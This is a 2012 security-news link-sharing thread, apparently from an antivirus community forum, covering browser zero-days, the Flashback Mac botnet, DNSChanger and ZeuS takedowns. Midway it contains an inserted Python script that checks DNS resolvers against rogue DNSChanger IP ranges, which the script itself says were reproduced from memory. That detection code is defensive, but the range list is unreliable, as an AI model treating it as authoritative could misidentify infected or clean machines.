https://www.zdnet.com/blog/security/cansecwest-pwnium-google-chrome-hacked-with-sandbox-bypass/10563
already fixed ;D http://googlechromereleases.blogspot.com/2012/03/chrome-stable-channel-update.html
-
Microsoft Security Bulletin Advance Notification for March 2012
http://technet.microsoft.com/en-us/security/bulletin/ms12-mar
-
Pwn2Own 2012: IE 9 hacked with two 0day vulnerabilities
https://www.zdnet.com/blog/security/pwn2own-2012-ie-9-hacked-with-two-0day-vulnerabilities/10621
-
Who are these VUPEN guys? They took down Chrome, now IE, and claim they also have hacks for Safari and Firefox. They also say they will only sell the hacks to their "customers". They sound more than a bit shady to me.
-
Global Malware Rates – Is Your Country Among The Safest Or Most Infected?
http://blogs.norman.com/2012/for-consumption/global-malware-rates-is-your-country-among-the-safest-or-infected
Lulzsec Arrests, Leader Sabu FBI Informant, Anonymous Retaliates
http://blogs.norman.com/2012/for-consumption/lulzsec-arrests-leader-sabu-fbi-informant-anonymous-retaliates
-
Feds shift DNSChanger cut-off deadline to July - Extra month granted to clean up infected gear
http://www.theregister.co.uk/2012/03/09/dnschanger_safety_net_extended/
-
MYSTERY programming language found in Duqu - Anti-virus boffins appeal to devs for help
http://www.theregister.co.uk/2012/03/08/duqu_trojan_mystery_code_riddle/
-
Researchers hack into newest Firefox with zero-day flaw
http://www.zdnet.com/blog/security/researchers-hack-into-newest-firefox-with-zero-day-flaw/10663
-
Malware Advancing Faster Than Companies Can Analyze It
http://www.darkreading.com/advanced-threats/167901091/security/news/232602289/malware-advancing-faster-than-companies-can-analyze-it.html
-
Patch Tuesday Targets Critical Windows Bug
http://blogs.norman.com/2012/security-exposed/patch-tuesday-targets-critical-windows-bug
-
Study analyses ten years of security holes
http://www.h-online.com/security/news/item/Study-analyses-ten-years-of-security-holes-1472674.html
-
Patch Tuesday Targets Critical Windows Bug
http://blogs.norman.com/2012/security-exposed/patch-tuesday-targets-critical-windows-bug
More here: http://blogs.technet.com/b/srd/archive/2012/03/13/cve-2012-0002-a-closer-look-at-ms12-020-s-critical-issue.aspx
-
Patch Tuesday Targets Critical Windows Bug
http://blogs.norman.com/2012/security-exposed/patch-tuesday-targets-critical-windows-bug
More here: http://blogs.technet.com/b/srd/archive/2012/03/13/cve-2012-0002-a-closer-look-at-ms12-020-s-critical-issue.aspx
Exploit circulating for Windows RDP vulnerability
http://www.h-online.com/security/news/item/Exploit-circulating-for-Windows-RDP-vulnerability-1474191.html
-
Mediyes – the dropper with a valid signature
https://www.securelist.com/en/blog/682/Mediyes_the_dropper_with_a_valid_signature
-
Again proven here how dangerous old, unpatched Java can be: https://www.securelist.com/en/blog/687/A_unique_fileless_bot_attacks_news_site_visitors#page_top
Link article author = Sergey Golovanov, Kaspersky Lab Expert, on Kaspersky's blog.
Use Java only if you cannot do without it, and see to it that it is always updated and fully patched via: http://secunia.com/vulnerability_scanning/online/
Also always install a decent AdBlocker add-on in your browser,
polonus
-
Poor Security Made Porn Site Hack Child’s Play
http://blogs.norman.com/2012/for-consumption/poor-security-made-porn-site-hack-childs-play
-
'Fileless' malware installs into RAM - Exploit found in Russian adware invades process, doesn't install files
http://www.theregister.co.uk/2012/03/18/fileless_malware_found/
PoC code uses super-critical Windows bug to crash PCs - Crash code real, but Sabu worm rumours ... not so much
http://www.theregister.co.uk/2012/03/16/rdp_worm/
-
Address spoofing vulnerability in iOS's Safari
http://www.h-online.com/security/news/item/Address-spoofing-vulnerability-in-iOS-s-Safari-1476314.html
-
Embarrassing security failure at PayPal
http://www.h-online.com/security/news/item/Embarrassing-security-failure-at-PayPal-1477905.html
-
Don’t ignore this advice: Update your Windows now
http://blogs.norman.com/2012/for-consumption/dont-ignore-this-advice-update-your-windows-now
-
Shopping For Zero-Days: A Price List For Hackers' Secret Software Exploits
http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/
-
btw. this thread should be sticky :)
-
No need for it to be a sticky (there are enough of those already) as there is enough activity to keep it near the top.
-
Fake LinkedIn SPAM Emails Hide Trojan Horse
http://blogs.norman.com/2012/for-consumption/fake-linkedin-spam-emails-hide-trojan-horse
Hackers booby-trap WordPress site with botnet-weaving Trojan - Crooks lure punters in with LinkedIn lies
http://www.theregister.co.uk/2012/03/23/wordpress_vuln_botnet_exploit/
Trojan moves its configuration to Twitter, LinkedIn, MSDN and Baidu
http://blogs.norman.com/2012/security-research/trojan-moves-its-configuration-to-twitter-linkedin-msdn-and-baidu
New Malware Type, Old Security Threat
http://blogs.norman.com/2012/for-consumption/new-malware-type-old-security-threat
Microsoft takes down ZeuS botnets - Disrupted ... but not dismantled
http://www.theregister.co.uk/2012/03/26/zeus_botnet_takedown/
-
***
Microsoft Takes Down Botnets Of Online Banking Thieves
Microsoft (NSDQ:MSFT) has taken down a number of malware-spreading botnets that infected millions of computers worldwide and stole more than $100 million from financial institutions and other businesses.
Under the escort of U.S. Marshals and with a warrant from a federal judge, Microsoft and two other co-plaintiffs in a lawsuit against the unidentified botnet operators seized command-and-control servers in Lombard, Ill., and Scranton, Penn., the Redmond, Wash.-based software maker said late Sunday. A federal court in New York granted permission for the seizure, which included taking control of 800 domains used in the criminal network.
http://www.crn.com/news/security/232700255/microsoft-takes-down-botnets-of-online-banking-thieves.htm?cid=nl_crn
***
-
long time no see Charley ;)
-
***
Thanks ... Life got busy and I needed a break. ;)
***
-
NSA Chief: China Behind RSA Attacks
http://www.informationweek.com/news/government/security/232700341?cid=RSSfeed_IWK_News
-
New Java Attack Rolled into Exploit Packs
http://krebsonsecurity.com/2012/03/new-java-attack-rolled-into-exploit-packs/
-
New hackers, old name: LulzSec Reborn hacks servers
http://www.h-online.com/security/news/item/New-hackers-old-name-LulzSec-Reborn-hacks-servers-1485081.html
-
Targeted attacks on Mac users reported
http://www.h-online.com/security/news/item/Targeted-attacks-on-Mac-users-reported-1486906.html
-
***
Adobe Fixes Critical Security Flaws In Flash Player
If you have not updated Flash Player in the last 24 hours, you need to do so now.
Adobe Systems has released a Flash Player update that fixes two critical vulnerabilities and adds an automatic update feature.
If left unpatched, the flaws could cause a crash and allow an attacker to take control of a computer, the company said Wednesday. The update is for Flash Player versions 10 and 11 and applies to all operating systems, Windows, Mac OS X, Linux and Solaris.
http://www.crn.com/news/security/232700519/adobe-fixes-critical-security-flaws-in-flash-player.htm?cid=nl_sec
***
-
MasterCard, VISA Warn of Processor Breach
http://krebsonsecurity.com/2012/03/mastercard-visa-warn-of-processor-breach/
-
MasterCard, VISA Warn of Processor Breach
http://krebsonsecurity.com/2012/03/mastercard-visa-warn-of-processor-breach/
I read that article yesterday (from a link over at Wilders, IIRC), and it sounds like most of the improper activity resulting from the breach is in the New York City area, and directed more at corporate accounts than individuals.
I phoned my bank last night (which handles Visa) to confirm the problem wasn't likely to affect transactions up this way, and the service rep made the interesting observation that the U.S. is way behind most of the rest of the world in card security. According to him, it's one of the very few countries still using just the swipe-strip ... banks in most others, including Canada, added embedded complex chips to their cards some years back.
-
MasterCard, VISA Warn of Processor Breach
http://krebsonsecurity.com/2012/03/mastercard-visa-warn-of-processor-breach/
I read that article yesterday (from a link over at Wilders, IIRC), and it sounds like most of the improper activity resulting from the breach is in the New York City area, and directed more at corporate accounts than individuals.
I phoned my bank last night (which handles Visa) to confirm the problem wasn't likely to affect transactions up this way, and the service rep made the interesting observation that the U.S. is way behind most of the rest of the world in card security. According to him, it's one of the very few countries still using just the swipe-strip ... banks in most others, including Canada, added embedded complex chips to their cards some years back.
That's because our banks here already know that if they run into a financial problem, someone will bail them out..... ;D
-
MasterCard, VISA Warn of Processor Breach
http://krebsonsecurity.com/2012/03/mastercard-visa-warn-of-processor-breach/
I read that article yesterday (from a link over at Wilders, IIRC), and it sounds like most of the improper activity resulting from the breach is in the New York City area, and directed more at corporate accounts than individuals.
I phoned my bank last night (which handles Visa) to confirm the problem wasn't likely to affect transactions up this way, and the service rep made the interesting observation that the U.S. is way behind most of the rest of the world in card security. According to him, it's one of the very few countries still using just the swipe-strip ... banks in most others, including Canada, added embedded complex chips to their cards some years back.
You are in Canada EH!
You do not have anything to worry about! ;)
You have the Canada Deposit Insurance Corporation to protect you! ;)
http://en.wikipedia.org/wiki/Canada_Deposit_Insurance_Corporation
-
Tweetdeck Offline After Apparent Bug Opens Up Access To “Hundreds” Of Accounts [Back Now]
http://techcrunch.com/2012/03/30/twitter-takes-tweetdeck-offline-after-apparent-bug-opens-access-to-accounts/
-
Hackers Can Steal Credit Card Information From Your Old Xbox
http://kotaku.com/5897461/hackers-can-steal-credit-card-information-from-your-old-xbox-experts-tell-us
http://kotaku.com/5897876/microsoft-investigating-claim-that-used-xbox-360s-contain-credit-card-info
-
Hackers Plan to Take Internet Offline on Saturday
http://blogs.norman.com/2012/for-consumption/hackers-plan-to-take-internet-offline-on-saturday
hmmmm....... I am still online ;)
-
Malware Invades Pet Microchip, Implants Strange Behaviour
http://blogs.norman.com/2012/for-consumption/malware-invades-pet-microchip-implants-strange-behaviour
;D
-
hmmmm....... I am still online ;)
Me too, seems we "survived" the canard/"attack"... ;D
Funny that this was posted on March 30th instead of April 1st. ;)
-
FTC Charges That Security Flaws in RockYou Game Site Exposed 32 Million Email Addresses and Passwords
http://www.ftc.gov/opa/2012/03/rockyou.shtm
-
http://news.cnet.com/8301-1009_3-57409619-83/more-than-600000-macs-infected-with-flashback-botnet/
More than 600,000 Macs infected with Flashback botnet
-
The favourite exploit being abused by the so-called "exploit packs" at the moment is the Java atomic exploit. This is a so-called 1-day exploit, just patched.
Please be protected against it by updating and patching your OS and third party software.
Go online and check your software here: http://secunia.com/vulnerability_scanning/online/
Overview of recent exploit pack exploits: http://contagiodump.blogspot.com/2010/06/overview-of-exploit-packs-update.html link article author = Mila
polonus
-
***
Apple Patches Java Bug
Apple released Wednesday a patch for multiple Java vulnerabilities, a couple of days after a security vendor reported that password-stealing malware exploiting the flaws was floating about the Web.
Apple launched Java for OS X Lion 2012-001 and Java for Mac OS X 10.6 Update 7 almost two months after patches for the same exploits were released for Windows. Experts often criticize the Mac maker for taking too long to patch Java vulnerabilities.
http://www.crn.com/news/security/232800301/apple-patches-malware-targeted-java-bug.htm;jsessionid=6kAI4rxOXrN6u+7N+A+N8g**.ecappj02?cid=nl_crn
***
-
Microsoft Security Bulletin Advance Notification for April 2012
http://technet.microsoft.com/en-us/security/bulletin/ms12-apr
-
***
Malicious Malware: Six Ways Cybercriminals Beat Security
The tactics of cybercriminals have evolved from using malware-carrying spam in a shotgun-like approach to finding doorways into corporate networks to studying the prey like a methodical marksman, learning security controls and figuring out ways to bypass them.
http://www.crn.com/slide-shows/security/232800295/malicious-malware-six-ways-cybercriminals-beat-security.htm;jsessionid=uqNTJ4UWKBhfSOA41w1cPw**.ecappj02?cid=nl_sec
***
-
***
Seven Cybercrime-Fighting Steps For Small Businesses
These steps can also be used by administrators of home networks and individuals.
Cybercrime represents a $2 trillion annual business, representing 15 percent of the global production of goods and services, according to the United Nations. Each year, criminals hone their skills and tools to become more adept at penetrating computer systems to steal credit-card numbers and corporate as well as government secrets.
http://www.crn.com/slide-shows/security/232800231/seven-cybercrime-fighting-steps-for-small-businesses.htm?cid=nl_sec
***
-
***
Mac Botnet Infects More Than 600,000 Apple Computers
More than 600,000 Apple Mac computers worldwide—more than half of them in the United States—have been hit by a new fast-moving variant of the Flashback Trojan malware that uses Javascript code rather than relying on user interaction, according to security researchers.
Officials with security software company Intego said in an April 3 blog post that they found samples of the new Flashback Trojan March 23, and noted that the new malware—like the previous version discovered last year—uses two Java vulnerabilities, they said, one of which was patched by Apple April 3. The malware attacks Macs running the Mac OS X operating system. It was ... noted that 274 of the infected Macs were found in Cupertino, Calif., where Apple keeps its headquarters.
http://www.eweek.com/c/a/Security/Mac-Botnet-Infects-More-Than-600000-Apple-Computers-699749/?kc=EWKNLEDP04062012B
***
-
more on the above
http://www.theregister.co.uk/2012/04/05/flashback_trojan_botnet/
Attackers first began to exploit two earlier Java vulnerabilities (CVE-2011-3544 and CVE-2008-5353) to spread malware in February 2012, before switching to another exploit (CVE-2012-0507) on 16 March – to devastating effect. ®
Apple is not the fastest to patch Java bugs
http://www.computerworld.com/s/article/9134442/Apple_finally_patches_six_month_old_Java_bugs
http://www.crn.com/news/security/232800152/mac-malware-exploits-apple-delay-with-java-patch.htm
http://www.theregister.co.uk/2012/04/04/apple_java_update/
-
Fake cop Trojan 'detects offensive materials' on PCs, demands money - Crooks exploit those embarrassing files we all have
http://www.theregister.co.uk/2012/04/05/police_themed_ransomware/
Trojan:W32/Reveton
http://www.f-secure.com/v-descs/trojan_w32_reveton.shtml
-
Prenotification Security Advisory for Adobe Reader and Acrobat
http://www.adobe.com/support/security/bulletins/apsb12-08.html
-
***
Mac Botnet Infects More Than 600,000 Apple Computers
More than 600,000 Apple Mac computers worldwide—more than half of them in the United States—have been hit by a new fast-moving variant of the Flashback Trojan malware that uses Javascript code rather than relying on user interaction, according to security researchers.
Officials with security software company Intego said in an April 3 blog post that they found samples of the new Flashback Trojan March 23, and noted that the new malware—like the previous version discovered last year—uses two Java vulnerabilities, they said, one of which was patched by Apple April 3. The malware attacks Macs running the Mac OS X operating system. It was ... noted that 274 of the infected Macs were found in Cupertino, Calif., where Apple keeps its headquarters.
http://www.eweek.com/c/a/Security/Mac-Botnet-Infects-More-Than-600000-Apple-Computers-699749/?kc=EWKNLEDP04062012B
***
I've been reading about this. Now they're saying it's bigger (on Macs) than Conficker was on Windows..
http://www.pcworld.com/businesscenter/article/253403/mac_malware_outbreak_is_bigger_than_conficker.html#tk.nl_dnx_h_crawl
If a Mac user has this, there are manual removal instructions here:
http://www.f-secure.com/v-descs/trojan-downloader_osx_flashback_i.shtml
-
Anonymous targets UK Government sites with DDoS
http://www.h-online.com/security/news/item/Anonymous-targets-UK-Government-sites-with-DDoS-1517438.html
-
***
Utah Data Breach of 181,000 Records Blamed on Configuration Error
Nearly 200,000 people who receive benefits from the Medicaid and Child Health Insurance Plan in Utah have had their personal information--including Social Security numbers in some cases--compromised as part of an intrusion on the network at the Utah Department of Technology Services. The 181,000 estimated victims is nearly eight times higher than the 24,000 people that the department initially thought were affected by the attack.
http://www.crnbuzz.com/index.php?r88r=/story/v1_left/html/CRN.v1.security/5364332f5556424673347879364448333555556a50413d3d
***
-
***
FBI: Smart Meter Hacks Likely to Spread
A series of hacks perpetrated against so-called “smart meter” installations over the past several years may have cost a single U.S. electric utility hundreds of millions of dollars annually, the FBI said in a cyber intelligence bulletin obtained by KrebsOnSecurity. The law enforcement agency said this is the first known report of criminals compromising the hi-tech meters, and that it expects this type of fraud to spread across the country as more utilities deploy smart grid technology.
http://krebsonsecurity.com/2012/04/fbi-smart-meter-hacks-likely-to-spread/
***
-
***
Watch Out, White Hats! European Union Moves to Criminalize ‘Hacking Tools’
The European Union is continuing a push to criminalize the production or sale of “hacking” tools, a move that civil liberties advocates argue could make criminals out of legitimate security researchers.
The proposal is intended to create stiffer penalties across Europe for hacking and denial of service attacks, imposing a maximum sentence of up to five years for hacking into a site or using a botnet to flood a site with fake traffic.
In my opinion, 5 years is way too lenient. The sentence should be, at the least, 2x that amount for real criminals.
On the other hand, legitimate security researchers should not be charged.
http://www.wired.com/threatlevel/2012/04/hacking-tools
***
-
***
Selling You on Facebook
Many popular Facebook apps are obtaining sensitive information about users—and users' friends—so don't be surprised if details about your religious, political and even sexual preferences start popping up in unexpected places.
http://online.wsj.com/article/SB10001424052702303302504577327744009046230.html
***
-
https://drweb.com/flashback/
https://drweb.com/flashback/chronology/
http://support.apple.com/kb/HT5244?viewlocale=en_US&locale=en_US
-
Zeus Targets Cloud Payroll Service to Siphon Money from Enterprises
http://www.trusteer.com/blog/zeus-targets-cloud-payroll-service-siphon-money-enterprises
-
HP distributes malware in flash card included in new networking kit.
http://www.theregister.co.uk/2012/04/11/hp_ships_malware_cards_with_switches_oops/
-
Trojan.Encoder heads West.
http://news.drweb.com/show/?i=2356&lng=en&c=5
-
New targeted Mac OS X Trojan requires no user interaction
"A new Mac OS X Trojan referred to as Backdoor.OSX.SabPub.a or SX/Sabpab-A is also exploiting Java vulnerabilities in a way that requires no user interaction. It is being used in targeted attacks"
http://www.zdnet.com/blog/security/new-targeted-mac-os-x-trojan-requires-no-user-interaction/11545
-
Critical vulnerability in IrfanView plugin
http://www.h-online.com/security/news/item/Critical-vulnerability-in-IrfanView-plugin-1539532.html
-
New version of Mac OS X Trojan exploits Word, not Java
http://www.zdnet.com/blog/security/new-version-of-mac-os-x-trojan-exploits-word-not-java/11566?tag=content;siu-container
-
New version of Mac OS X Trojan exploits Word, not Java
http://www.zdnet.com/blog/security/new-version-of-mac-os-x-trojan-exploits-word-not-java/11566?tag=content;siu-container
Uh Uh... Mac infections are coming and coming... ;D
-
Oracle Critical Patch Update Advisory - April 2012
http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
-
Rmnet.12 created a million Windows computer botnet
http://news.drweb.com/show/?i=2374&lng=en&c=5
-
Websites using 14 tracking tools to nab your data, says Truste research
http://www.dailytelegraph.com.au/technology/websites-using-14-tracking-tools-to-take-your-data-says-truste/story-fn7bsi21-1226333237000
-
Google warns the operators of thousands of hacked web sites
http://www.h-online.com/security/news/item/Google-warns-the-operators-of-thousands-of-hacked-web-sites-1542374.html
-
Fake Instagram app infects Android devices with malware
http://nakedsecurity.sophos.com/2012/04/18/fake-instagram-app-android-malwar/
-
Doctor Web doesn't register significant decrease in BackDoor.Flashback.39 bot number
http://news.drweb.com/show/?i=2386&lng=en&c=5
-
***
Web Apps Create New Security Risks
There's no debate that security is growing infinitely more complex by the day. As organizations open their networks to customers, business partners and others, the risks continue to grow. Mobile devices and open-source codes further complicate matters--all while hackers and cyber-crooks become more sophisticated and aggressive. Although most organizations have a spate of digital security protections in place, a March 2011 study found that many of the most obvious threats go unnoticed and untargeted. What's more, the situation is growing more challenging.
http://www.baselinemag.com/c/a/Security/Web-Apps-Create-New-Security-Risks-367935/?kc=EWKNLEDP04202012C
***
-
***
Internet Founder Berners-Lee: CISPA a Threat to Privacy Rights
A must read ...
Tim Berners-Lee, the man credited with inventing the Internet and a staunch advocate for a free and open Web, is the latest to wade into the fray, telling the British publication The Guardian that CISPA not only puts U.S. citizens at risk, but also people around the world.
The legislation “is threatening the rights of people in America, and effectively rights everywhere, because what happens in America tends to affect people all over the world,” Berners-Lee said in the interview. “Even though the SOPA and PIPA acts were stopped by huge public outcry, it’s staggering how quickly the U.S. government has come back with a new, different threat to the rights of its citizens.”
Berners-Lee’s comments came as part of a larger discussion about similar legislation being proposed by the British government. Both proposals represented a dangerous expansion of government surveillance capabilities that threaten the basic human rights of citizens, he said.
http://www.eweek.com/c/a/Security/Internet-Founder-BernersLee-CISPA-a-Threat-to-Privacy-Rights-436464/?kc=EWKNLEDP04202012D
***
-
Internet Founder Berners-Lee: CISPA a Threat to Privacy Rights
More here: http://forum.avast.com/index.php?topic=66267.msg776837#msg776837
CISPA Petition: https://secure.avaaz.org/en/stop_cispa/
-
Malware Learns to Avoid Web-Based Anti-Virus
http://blogs.norman.com/2012/for-consumption/malware-learns-to-avoid-web-based-anti-virus
Using a VPN Doesn’t Mean Your Information Is Safe When You Travel
http://blogs.norman.com/2012/security-exposed/using-a-vpn-doesnt-mean-your-information-is-safe-when-you-travel
-
FBI seizes US anonymisation server
http://www.h-online.com/security/news/item/FBI-seizes-US-anonymisation-server-1544886.html
-
FBI seizes US anonymisation server
http://www.h-online.com/security/news/item/FBI-seizes-US-anonymisation-server-1544886.html
Asyn is being anonymous and so am I. ;D
-
FBI seizes US anonymisation server
http://www.h-online.com/security/news/item/FBI-seizes-US-anonymisation-server-1544886.html
Asyn is being anonymous and so am I. ;D
Well, I'm not really anonymous with just adding a ".B" to my name. ;)
Anyway, a nice avatar Bob.
-
WordPress fixes file upload security problems
http://www.h-online.com/security/news/item/WordPress-fixes-file-upload-security-problems-1545416.html
http://wordpress.org/news/2012/04/wordpress-3-3-2/
-
***
Russian Security Firm Says Flashback Botnet Is Not Shrinking
Contrary to recent reports, the worldwide botnet of Macs infected with the Flashback malware has remained relatively steady in size, the Russian security vendor Dr. Web said over the weekend.
Dr. Web discovered the botnet -- which it calls BackDoor.Flashback.39 -- on April 4. It claims that more than 817,000 bots have connected to the botnet thus far, and that an average of 550,000 infected machines are interacting with a command-and-control server each day.
New infected machines that have not yet been registered in the botnet -- and which cannot yet be tracked -- are joining every day, according to Dr. Web.
Dr. Web's latest findings contradict those of Symantec and Kaspersky Lab, which earlier this month reported that the Flashback botnet had shrunk to less than half its peak size of 650,000 infected machines due to Apple's work with Internet service providers to take down command-and-control servers and the release of malware removal tools from third parties.
http://www.crn.com/news/security/232900794/russian-security-firm-says-flashback-botnet-is-not-shrinking.htm;jsessionid=MFnY1U++W2e06EL0spmQkw**.ecappj03?cid=nl_sec
***
-
Beware of dangerous Trojan in spam
http://news.drweb.com/show/?i=2406&lng=en&c=5
-
Doctor Web analyzes objects downloaded by BackDoor.Flashback onto infected Macs
http://news.drweb.com/show/?i=2410&lng=en&c=5
-
Online forums hacked and misused on a large scale
http://www.h-online.com/security/news/item/Online-forums-hacked-and-misused-on-a-large-scale-1558917.html
-
E-Mail, Source Code From VMWare Bubbles Up From Compromised Chinese Firm
http://threatpost.com/en_us/blogs/e-mail-source-code-vmware-bubble-compromised-chinese-firm-042412
http://blogs.vmware.com/security/2012/04/vmware-security-note.html
-
Four Doomsday Scenarios for Internet-Enabled Toasters
http://blogs.norman.com/2012/for-consumption/four-doomsday-scenarios-for-internet-enabled-toasters
TV-based botnets? DoS attacks on your fridge? More plausible than you think
http://arstechnica.com/business/news/2012/04/tv-based-botnets-ddos-attacks-on-your-fridge-more-plausible-than-you-think.ars
-
Kaspersky: Apple security is like Microsoft's in 2002
http://www.theregister.co.uk/2012/05/02/kaspersky_apple_flashback_microsoft/
Dr. Web disputes Flashback Mac Trojan bot army estimates
http://www.theregister.co.uk/2012/04/25/flashback_mac_trojan_update/
-
***
VMware Releases Expedited Patches For ESX Source Code Leak
VMware on Thursday released security patches for products it says could face heightened risk due to last month's ESX server hypervisor source code leak.
The patches address five "critical security issues" in VMware's Workstation, Player, ESXi and ESX products, the Palo Alto, Calif.-based vendor said in a security bulletin. All five vulnerabilities could enable an attacker to execute code on the host; two require root or administrator level permissions and two do not.
http://www.crn.com/news/data-center/232901420/vmware-releases-expedited-patches-for-esx-source-code-leak.htm;jsessionid=vLil9xCQLdS2fQYplc8r6A**.ecappj01?cid=nl_crn
***
-
***
Attackers Add Ransomware to Bank Fraud Malware
A notorious malware platform targeting financial information has added a new trick to its portfolio—a digital version of hijack and ransom.
According to security firm Trusteer, the Citadel malware platform is delivering ransomware that hijacks victims' computers. Ransomware works by restricting access to infected computer systems so that the attackers can extort payment in exchange for restoring access.
In this case, the ransomware, known as Reveton, locks the compromised computer down and displays a message demanding $100 to unfreeze it. The demand poses as a message from the U.S. Department of Justice and claims the computer's operating system has been locked due to the presence of child pornography.
http://www.eweek.com/c/a/Security/Attackers-Add-Ransomware-to-Bank-Fraud-Malware-Security-Researchers-611150/?kc=EWKNLEDP05042012E
***
-
New Adobe Flash Update, Version 11.2.202.235 for IE
http://forums.cnet.com/7723-6132_102-562428/security-update-available-for-adobe-flash-player-apsb12-09/?tag=contentMain;contentAux
Release posted today; exploit active in the wild. Old version 11.2.202.233. Affects IE and ActiveX components only.
-
Skype divulges user IP addresses
http://www.h-online.com/security/news/item/Skype-divulges-user-IP-addresses-Update-1564236.html
http://skype-open-source.blogspot.com/2012/04/skype-user-ip-address-disclosure.html
-
If you already permit geo location, it really isn't a big deal. If you don't, then it's a different story.
Screenshot: http://my.jetscreenshot.com/2701/20120505-u4lh-84kb
-
Also see this malware geolocation service abuse: -http://community.websense.com/blogs/securitylabs/archive/2012/05/03/widespread-malware-abuses-unsecured-geolocation-service-of-adult-website.aspx (link Websense Security Labs Blog)
polonus
-
Microsoft Security Bulletin Advance Notification for May 2012
http://technet.microsoft.com/en-us/security/bulletin/ms12-may
-
Worried about Mac malware? Just set up OpenDNS.
http://blog.opendns.com/2012/04/09/worried-about-mac-malware-just-set-up-opendns/?utm_source=nl0512&utm_medium=em&utm_campaign=home
OpenDNS + CloudFlare == DNSChanger solution. Or, how to not lose Internet on July 9.
http://blog.opendns.com/2012/05/03/opendns-cloudflare-dnschanger-solution-or-how-to-not-lose-internet-on-july-9/
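The practical check behind the DNSChanger advice above is simply "which resolvers is this machine using, and are any of them the rogue ones?". The following is an added example, not code from OpenDNS or from the posts in this thread. It tests resolver addresses against the rogue resolver ranges that the DNSChanger Working Group and the FBI published for the Rove Digital servers; the six ranges are reproduced from memory, so treat them as an assumption and confirm them against the DCWG list before acting on a hit. The resolv.conf and ipconfig excerpts are constructed samples.

```python
"""Added example: check configured DNS resolvers against the DNSChanger rogue ranges."""
import ipaddress
import os

# Rogue resolver ranges attributed to DNSChanger (assumed accurate; verify against the DCWG list)
ROGUE_RANGES = [ipaddress.ip_network(n) for n in (
    "85.255.112.0/20",   # 85.255.112.0  - 85.255.127.255
    "67.210.0.0/20",     # 67.210.0.0    - 67.210.15.255
    "93.188.160.0/21",   # 93.188.160.0  - 93.188.167.255
    "77.67.83.0/24",     # 77.67.83.0    - 77.67.83.255
    "213.109.64.0/20",   # 213.109.64.0  - 213.109.79.255
    "64.28.176.0/20",    # 64.28.176.0   - 64.28.191.255
)]


def is_rogue_resolver(addr):
    """True if addr (a string) lies in any rogue range; anything that is not an IP is False."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in ROGUE_RANGES)


def parse_resolv_conf(text):
    """Extract nameserver addresses from /etc/resolv.conf-style text, ignoring comments."""
    servers = []
    for line in text.splitlines():
        parts = line.split("#", 1)[0].split()
        if len(parts) >= 2 and parts[0] == "nameserver":
            servers.append(parts[1])
    return servers


def parse_ipconfig(text):
    """Extract DNS server addresses from English-locale `ipconfig /all` output.

    The first address sits after the 'DNS Servers' label; extra resolvers follow on
    continuation lines that carry nothing but an address, so collect until a line
    that is not an address."""
    servers, collecting = [], False
    for line in text.splitlines():
        stripped = line.strip()
        if "DNS Servers" in stripped and ":" in stripped:
            stripped = stripped.split(":", 1)[1].strip()
            collecting = True
        elif not collecting:
            continue
        try:
            ipaddress.ip_address(stripped)
            servers.append(stripped)
        except ValueError:
            collecting = False
    return servers


def check_resolvers(servers):
    """Return [(address, is_rogue)] for each configured resolver."""
    return [(s, is_rogue_resolver(s)) for s in servers]


def check_local_resolv_conf(path="/etc/resolv.conf"):
    """Check the live resolver configuration where a resolv.conf exists (empty list otherwise)."""
    if not os.path.exists(path):
        return []
    with open(path) as fh:
        return check_resolvers(parse_resolv_conf(fh.read()))


# Constructed samples: one infected-looking resolv.conf and one ipconfig excerpt
SAMPLE_RESOLV_CONF = """\
# Generated by NetworkManager
nameserver 85.255.112.36
nameserver 8.8.8.8
"""
SAMPLE_IPCONFIG = """\
   DHCP Enabled. . . . . . . . . . . : Yes
   DNS Servers . . . . . . . . . . . : 93.188.161.4
                                       208.67.222.222
   NetBIOS over Tcpip. . . . . . . . : Enabled
"""

if __name__ == "__main__":
    results = check_resolvers(parse_resolv_conf(SAMPLE_RESOLV_CONF))
    results += check_resolvers(parse_ipconfig(SAMPLE_IPCONFIG))
    results += check_local_resolv_conf()
    for addr, rogue in results:
        print(f"{addr:20s} {'ROGUE (DNSChanger)' if rogue else 'ok'}")
```

A rogue hit means the machine's DNS settings were rewritten; changing the resolver back (to the ISP's, OpenDNS, or any other known-good server) is only half the fix, since the malware that changed them may still be present.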
-
Don't use the Facebook Like Button in the USA
http://news.yahoo.com/liking-something-facebook-not-protected-first-amendment-193018772.html
-
Oracle makes SSL use in database clusters free
http://www.h-online.com/security/news/item/Oracle-makes-SSL-use-in-database-clusters-free-1565661.html
-
Privacy concerns over popular ShowIP Firefox add-on
http://nakedsecurity.sophos.com/2012/05/01/privacy-concern-showip-firefox-add-on/
-
Religious Websites Worse Than Porn (For Viruses)
http://blogs.norman.com/2012/for-consumption/religious-websites-worse-than-porn-for-viruses
Unusual cyber attack targets continue: This time Ethiopia
http://blogs.norman.com/2012/security-research/unusual-cyber-attack-targets-continue-this-time-ethiopia
-
Online Armor blocking Flash Player updates.
http://support.emsisoft.com/topic/7839-flash-update-being-blocked/
Bummer. Switched to Private Firewall...for now. ???
-
Firefox security bug (proxy-bypass) in current TBBs
https://blog.torproject.org/blog/firefox-security-bug-proxy-bypass-current-tbbs
-
Android malware opens back door to the intranet
http://www.h-online.com/security/news/item/Android-malware-opens-back-door-to-the-intranet-1567374.html
-
Critical open hole in PHP creates risks
http://www.h-online.com/security/news/item/Critical-open-hole-in-PHP-creates-risks-1567532.html
-
This is my first post so as to basically introduce myself and also to ask for a bit of advice re Security, so I hope I am in the right place!
I am now a retired Mechanical/Electronics Engineer plus I was a Professional Driving Instructor for 12 years just before retirement and hopefully still have most of my ‘marbles’!! My home is Essex G.B., too near London for comfort re traffic and parking problems!
I have joined this forum as I am having problems with Avast on my self-built 7-year-old P.C. Briefly, I have built a few PCs over the years, mainly for my own and family use. I started off in the early 80's with Windows 95, progressing through each Windows upgrade to what I am using currently, Windows XP Home Service Pack 3. I am not into programming, by the way. My present PC is 7 years of age and consists of an Abit NF7 vs. 2 motherboard, 1.5Gb RAM, Radeon 9200 series graphics, one on-board 500Gb (C) h/d plus one on-board 250Gb (D) h/d, and two USB drives consisting of a 1T/byte My Book and an 8Gb key. Yes, I am very aware this is a very basic machine by today's standards, but it does everything (so far) that I need from a computer.
